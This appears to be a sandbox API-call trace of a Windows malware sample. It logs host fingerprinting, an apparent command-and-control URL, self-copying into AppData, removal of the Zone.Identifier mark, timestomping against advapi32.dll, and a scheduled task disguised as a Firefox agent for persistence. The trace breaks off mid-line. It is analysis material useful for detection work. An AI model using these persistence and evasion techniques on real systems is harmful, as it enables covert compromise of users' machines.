Sleep (dwMilliseconds=0xa) [0124.038] Sleep (dwMilliseconds=0xa) [0124.049] Sleep (dwMilliseconds=0xa) [0124.060] Sleep (dwMilliseconds=0xa) [0124.070] Sleep (dwMilliseconds=0xa) [0124.081] Sleep (dwMilliseconds=0xa) [0124.091] Sleep (dwMilliseconds=0xa) [0124.102] Sleep (dwMilliseconds=0xa) [0124.116] Sleep (dwMilliseconds=0xa) [0124.162] Sleep (dwMilliseconds=0xa) [0124.173] Sleep (dwMilliseconds=0xa) [0124.184] Sleep (dwMilliseconds=0xa) [0124.205] Sleep (dwMilliseconds=0xa) [0124.216] Sleep (dwMilliseconds=0xa) [0124.227] Sleep (dwMilliseconds=0xa) [0124.237] Sleep (dwMilliseconds=0xa) [0124.401] Sleep (dwMilliseconds=0xa) [0124.412] Sleep (dwMilliseconds=0xa) [0124.423] Sleep (dwMilliseconds=0xa) [0124.433] Sleep (dwMilliseconds=0xa) [0124.443] Sleep (dwMilliseconds=0xa) [0124.454] Sleep (dwMilliseconds=0xa) [0124.464] Sleep (dwMilliseconds=0xa) [0124.475] Sleep (dwMilliseconds=0xa) [0124.485] Sleep (dwMilliseconds=0xa) [0124.497] Sleep (dwMilliseconds=0xa) [0124.509] Sleep (dwMilliseconds=0xa) [0124.519] Sleep (dwMilliseconds=0xa) [0124.609] GetSystemDirectoryA (in: lpBuffer=0x109efde0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0124.609] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" [0124.610] RtlGetVersion (in: lpVersionInformation=0x2830457 | out: lpVersionInformation=0x2830457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0124.610] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x109efdc8 | out: TokenHandle=0x109efdc8*=0x1f3c) returned 1 [0124.610] GetTokenInformation (in: TokenHandle=0x1f3c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x109efdc0 | out: TokenInformation=0x0, ReturnLength=0x109efdc0) returned 0 [0124.610] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x25) returned 0x9880830 [0124.610] GetTokenInformation (in: TokenHandle=0x1f3c, TokenInformationClass=0x19, TokenInformation=0x9880830, TokenInformationLength=0x1c, ReturnLength=0x109efdc0 | out: TokenInformation=0x9880830, ReturnLength=0x109efdc0) returned 1 [0124.610] GetSidSubAuthorityCount (pSid=0x9880840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x9880841 [0124.610] GetSidSubAuthority (pSid=0x9880840*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x9880848 [0124.610] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0124.610] CloseHandle (hObject=0x1f3c) returned 1 [0124.610] GetComputerNameA (in: lpBuffer=0x109efe90, nSize=0x109efed0 | out: lpBuffer="XC64ZB", nSize=0x109efed0) returned 1 [0124.611] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x109efec0, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x109efec0*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.611] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x29) returned 0x9880830 [0124.611] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x14) returned 0x9880870 [0124.611] wsprintfA (in: param_1=0x9880830, param_2="%s%08X%08X" | out: param_1="XC64ZB99FC78690C287F38") returned 22 [0124.612] CryptAcquireContextA (in: phProv=0x109efe18, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x109efe18*=0x8798e80) returned 1 [0124.615] CryptCreateHash (in: hProv=0x8798e80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x109efe10 | out: phHash=0x109efe10) returned 1 [0124.615] lstrlenA (lpString="XC64ZB99FC78690C287F38") returned 22 [0124.615] CryptHashData (hHash=0xabe7580, pbData=0x9880830, dwDataLen=0x16, dwFlags=0x0) returned 1 [0124.615] CryptGetHashParam (in: hHash=0xabe7580, dwParam=0x2, pbData=0x109efe20, pdwDataLen=0x109efe50, dwFlags=0x0 | out: pbData=0x109efe20, pdwDataLen=0x109efe50) returned 1 [0124.615] wsprintfA (in: param_1=0x283020c, param_2="%02X" | out: param_1="FE") returned 2 [0124.616] wsprintfA (in: param_1=0x283020e, param_2="%02X" | out: param_1="7F") returned 2 [0124.616] wsprintfA (in: param_1=0x2830210, param_2="%02X" | out: param_1="15") returned 2 [0124.616] wsprintfA (in: param_1=0x2830212, param_2="%02X" | out: param_1="06") returned 2 [0124.616] wsprintfA (in: param_1=0x2830214, param_2="%02X" | out: param_1="0B") returned 2 [0124.616] wsprintfA (in: param_1=0x2830216, param_2="%02X" | out: param_1="87") returned 2 [0124.616] wsprintfA (in: param_1=0x2830218, param_2="%02X" | out: param_1="5F") returned 2 [0124.616] wsprintfA (in: param_1=0x283021a, param_2="%02X" | out: param_1="B9") returned 2 [0124.616] wsprintfA (in: param_1=0x283021c, param_2="%02X" | out: param_1="FB") returned 2 [0124.616] wsprintfA (in: param_1=0x283021e, param_2="%02X" | out: param_1="2A") returned 2 [0124.616] wsprintfA (in: param_1=0x2830220, param_2="%02X" | out: param_1="49") returned 2 [0124.616] wsprintfA (in: param_1=0x2830222, param_2="%02X" | out: param_1="F0") returned 2 [0124.616] wsprintfA (in: param_1=0x2830224, param_2="%02X" | out: param_1="8D") returned 2 [0124.616] wsprintfA (in: param_1=0x2830226, param_2="%02X" | out: param_1="5D") returned 2 [0124.616] wsprintfA (in: param_1=0x2830228, param_2="%02X" | out: param_1="03") returned 2 [0124.616] wsprintfA (in: param_1=0x283022a, param_2="%02X" | out: param_1="12") returned 2 [0124.616] CryptDestroyHash (hHash=0xabe7580) returned 1 [0124.616] CryptReleaseContext (hProv=0x8798e80, dwFlags=0x0) returned 1 [0124.616] wsprintfA (in: param_1=0x283022c, param_2="%08X" | out: param_1="0C287F38") returned 8 [0124.616] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880870) returned 1 [0124.616] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0124.616] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0xe) returned 0x9880830 [0124.616] wsprintfA (in: param_1=0x2830dbe, param_2="%sFF" | out: param_1="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 42 [0124.616] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0124.616] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned 0x1f3c [0124.617] RtlGetLastWin32Error () returned 0x0 [0124.617] GetTickCount () returned 0xb377e8 [0124.617] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x1008) returned 0x9880830 [0124.617] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x2e) returned 0x9881840 [0124.617] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x109efed8 | out: phkResult=0x109efed8*=0x1cc4) returned 0x0 [0124.617] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x14) returned 0x9881880 [0124.617] RegQueryValueExA (in: hKey=0x1cc4, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x109efe60, lpcbData=0x109efec0*=0x20 | out: lpType=0x0, lpData=0x109efe60*=0x31, lpcbData=0x109efec0*=0xd) returned 0x0 [0124.617] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881880) returned 1 [0124.617] lstrlenA (lpString="11.0.10586.0") returned 12 [0124.617] lstrlenA (lpString=".") returned 1 [0124.617] atoi (_Str="11") returned 11 [0124.617] RegCloseKey (hKey=0x1cc4) returned 0x0 [0124.617] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0124.617] ObtainUserAgentString (in: dwOption=0xb, pszUAOut=0x9880830, cbSize=0x109efec0 | out: pszUAOut="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", cbSize=0x109efec0) returned 0x0 [0124.672] lstrlenA (lpString="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 74 [0124.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9880830, cbMultiByte=75, lpWideCharStr=0x2830577, cchWideChar=150 | out: lpWideCharStr="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko") returned 75 [0124.672] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0124.672] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x1008) returned 0x9880830 [0124.673] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x1c) returned 0x9881840 [0124.673] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x9880830, nSize=0x105 | out: lpDst="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x26 [0124.673] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0124.673] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x16) returned 0x9881840 [0124.673] wsprintfW (in: param_1=0x28307a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 45 [0124.673] wsprintfW (in: param_1=0x2830bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa") returned 45 [0124.673] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0124.673] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x21) returned 0x9881840 [0124.673] lstrlenA (lpString="http://kimballiett2.top/") returned 24 [0124.673] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x9881840, Length=0x18) returned 0x19e5a706 [0124.673] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0124.673] lstrcmpW (lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 1 [0124.673] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0 [0124.673] CopyFileW (lpExistingFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe"), lpNewFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), bFailIfExists=0) returned 1 [0125.321] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d0426ed95048ec08395edddaaa1d3ccc7a3f769d4324195e1f075b16f462a4c6.exe")) returned 1 [0125.397] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9881840 [0125.397] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x2a) returned 0x9881860 [0125.397] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x408) returned 0x98818a0 [0125.397] wsprintfW (in: param_1=0x98818a0, param_2="%s%s" | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier") returned 61 [0125.398] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih:Zone.Identifier" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih:zone.identifier")) returned 0 [0125.398] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x98818a0) returned 1 [0125.398] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0125.398] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881860) returned 1 [0125.398] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x16) returned 0x9881840 [0125.398] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x210) returned 0x9881860 [0125.398] GetSystemDirectoryA (in: lpBuffer=0x9881860, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0125.398] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0125.398] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0125.398] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwFileAttributes=0x6) returned 1 [0125.398] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x198c [0125.399] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x109efe30 | out: lpFileInformation=0x109efe30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a16bf4b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a16bf4b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a16bf4b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa3ef0)) returned 1 [0125.399] SetFileTime (hFile=0x198c, lpCreationTime=0x109efe34, lpLastAccessTime=0x109efe3c, lpLastWriteTime=0x109efe44) returned 1 [0125.399] CloseHandle (hObject=0x198c) returned 1 [0125.399] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881860) returned 1 [0125.399] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0125.399] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x418) returned 0x9881840 [0125.399] lstrcatW (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0125.399] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x212) returned 0x9881c60 [0125.399] GetUserNameW (in: lpBuffer=0x9881c60, pcbBuffer=0x109efe70 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x109efe70) returned 1 [0125.403] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9881e80 [0125.403] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x4c) returned 0x9881fa0 [0125.404] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10d) returned 0x9882000 [0125.404] wsprintfW (in: param_1=0x9881e80, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent FE7F15060B875FB9") returned 46 [0125.404] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9882000) returned 1 [0125.404] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881fa0) returned 1 [0125.404] CoCreateInstance (in: rclsid=0x521010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x521000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x109efd08 | out: ppv=0x109efd08*=0x3d75bb0) returned 0x0 [0125.820] TaskScheduler:ITaskService:Connect (This=0x3d75bb0, serverName=0x109efd80*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), user=0x109efda0*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), domain=0x109efd60*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), password=0x109efde0*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6)) returned 0x0 [0125.926] TaskScheduler:ITaskService:GetFolder (in: This=0x3d75bb0, Path="", ppFolder=0x109efd28 | out: ppFolder=0x109efd28*=0x3d4d920) returned 0x0 [0125.928] ITaskFolder:DeleteTask (This=0x3d4d920, Name="Firefox Default Browser Agent FE7F15060B875FB9", flags=0) returned 0x80070002 [0125.929] TaskScheduler:ITaskService:NewTask (in: This=0x3d75bb0, flags=0x0, ppDefinition=0x109efe40 | out: ppDefinition=0x109efe40*=0x3d40f30) returned 0x0 [0125.930] ITaskDefinition:get_RegistrationInfo (in: This=0x3d40f30, ppRegistrationInfo=0x109efd40 | out: ppRegistrationInfo=0x109efd40*=0x3ced120) returned 0x0 [0125.930] IRegistrationInfo:put_Author (This=0x3ced120, Author="RDhJ0CNFevzX") returned 0x0 [0125.930] IUnknown:Release (This=0x3ced120) returned 0x1 [0125.930] ITaskDefinition:get_Settings (in: This=0x3d40f30, ppSettings=0x109efd18 | out: ppSettings=0x109efd18*=0x3cecd60) returned 0x0 [0125.931] ITaskSettings:put_StartWhenAvailable (This=0x3cecd60, StartWhenAvailable=1) returned 0x0 [0125.931] IUnknown:Release (This=0x3cecd60) returned 0x3 [0125.931] ITaskDefinition:get_Triggers (in: This=0x3d40f30, ppTriggers=0x109efd20 | out: ppTriggers=0x109efd20*=0x3cfb9b0) returned 0x0 [0125.931] ITriggerCollection:Create (in: This=0x3cfb9b0, Type=1, ppTrigger=0x109efe30 | out: ppTrigger=0x109efe30*=0x3d41c20) returned 0x0 [0125.931] IUnknown:QueryInterface (in: This=0x3d41c20, riid=0x521030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x109efd10 | out: ppvObject=0x109efd10*=0x3d41c20) returned 0x0 [0125.931] ITrigger:get_Repetition (in: This=0x3d41c20, ppRepeat=0x109efd00 | out: ppRepeat=0x109efd00*=0x3d586f0) returned 0x0 [0125.931] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x14) returned 0x9881fa0 [0125.931] IRepetitionPattern:put_Interval (This=0x3d586f0, Interval="PT10M") returned 0x0 [0125.932] ITrigger:put_Repetition (This=0x3d41c20, Repetition=0x3d586f0) returned 0x0 [0125.932] IUnknown:Release (This=0x3d586f0) returned 0x1 [0125.932] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x30) returned 0x9881fc0 [0125.932] ITrigger:put_StartBoundary (This=0x3d41c20, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0125.932] IUnknown:Release (This=0x3d41c20) returned 0x2 [0125.932] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881fc0) returned 1 [0125.932] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881fa0) returned 1 [0125.932] IUnknown:Release (This=0x3d41c20) returned 0x1 [0125.932] ITriggerCollection:Create (in: This=0x3cfb9b0, Type=9, ppTrigger=0x109efe30 | out: ppTrigger=0x109efe30*=0x3cf3f20) returned 0x0 [0125.932] IUnknown:QueryInterface (in: This=0x3cf3f20, riid=0x521020*(Data1=0x72dade38, Data2=0xfae4, Data3=0x4b3e, Data4=([0]=0xba, [1]=0xf4, [2]=0x5d, [3]=0x0, [4]=0x9a, [5]=0xf0, [6]=0x2b, [7]=0x1c)), ppvObject=0x109efd00 | out: ppvObject=0x109efd00*=0x3cf3f20) returned 0x0 [0125.932] ILogonTrigger:put_UserId (This=0x3cf3f20, UserId="RDhJ0CNFevzX") returned 0x0 [0125.937] IUnknown:Release (This=0x3cf3f20) returned 0x2 [0125.937] IUnknown:Release (This=0x3cf3f20) returned 0x1 [0125.937] ITaskDefinition:get_Actions (in: This=0x3d40f30, ppActions=0x109efd30 | out: ppActions=0x109efd30*=0x3d4dd20) returned 0x0 [0125.938] IActionCollection:Create (in: This=0x3d4dd20, Type=0, ppAction=0x109efd48 | out: ppAction=0x109efd48*=0x3cfbb00) returned 0x0 [0125.938] IUnknown:Release (This=0x3d4dd20) returned 0x1 [0125.938] IUnknown:QueryInterface (in: This=0x3cfbb00, riid=0x521040*(Data1=0x4c3d624d, Data2=0xfd6b, Data3=0x49a3, Data4=([0]=0xb9, [1]=0xb7, [2]=0x9, [3]=0xcb, [4]=0x3c, [5]=0xd3, [6]=0xf0, [7]=0x47)), ppvObject=0x109efd38 | out: ppvObject=0x109efd38*=0x3cfbb00) returned 0x0 [0125.938] IExecAction:put_Path (This=0x3cfbb00, Path="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih") returned 0x0 [0125.938] IUnknown:Release (This=0x3cfbb00) returned 0x2 [0125.938] ITaskFolder:RegisterTaskDefinition (in: This=0x3d4d920, Path="Firefox Default Browser Agent FE7F15060B875FB9", pDefinition=0x3d40f30, flags=6, UserId=0x109efd60*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), password=0x109efda0*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), LogonType=3, sddl=0x109efd80*(varType=0x0, wReserved1=0x283, wReserved2=0x0, wReserved3=0x0, varVal1=0x7ffb260b81fc, varVal2=0x28307a6), ppTask=0x109efd00 | out: ppTask=0x109efd00*=0x3ced060) returned 0x0 [0127.298] IUnknown:Release (This=0x3cfbb00) returned 0x1 [0127.298] IUnknown:Release (This=0x3cfb9b0) returned 0x1 [0127.298] TaskScheduler:IUnknown:Release (This=0x3d40f30) returned 0x0 [0127.298] TaskScheduler:IUnknown:Release (This=0x3d4d920) returned 0x0 [0127.298] TaskScheduler:IUnknown:Release (This=0x3d75bb0) returned 0x0 [0127.298] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881e80) returned 1 [0127.299] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881840) returned 1 [0127.299] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9881c60) returned 1 [0127.299] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c9c [0127.299] CreateFileMappingA (hFile=0x0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfa000, lpName="FE7F15060B875FB9FB2A49F08D5D03120C287F38FF") returned 0x1cdc [0127.300] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x22) returned 0x9881840 [0127.300] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wvhwbfa" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\wvhwbfa"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x26e01315 [0127.300] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x61) returned 0x9881870 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xef38e650 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x76c941fb [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x72175d89 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x8a2591e [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5b35f987 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfea1dba3 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x6f0375 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x657c63b2 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x42928142 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x77814a52 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3eef7c79 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x3d45ca6f [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd7772126 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9fb939ba [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x2d9c66a7 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x18f76388 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xdab3f869 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x4fe87838 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x66e72eb3 [0127.300] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xd8a48a8e [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x5e7bfe53 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xa4636651 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xc355204 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf598a2b0 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x9a2d666f [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xfb988ed0 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0xf76317c9 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: Seed=0x2830e9e) returned 0x48d15a22 [0127.301] RtlRandom (in: Seed=0x2830e9e | out: 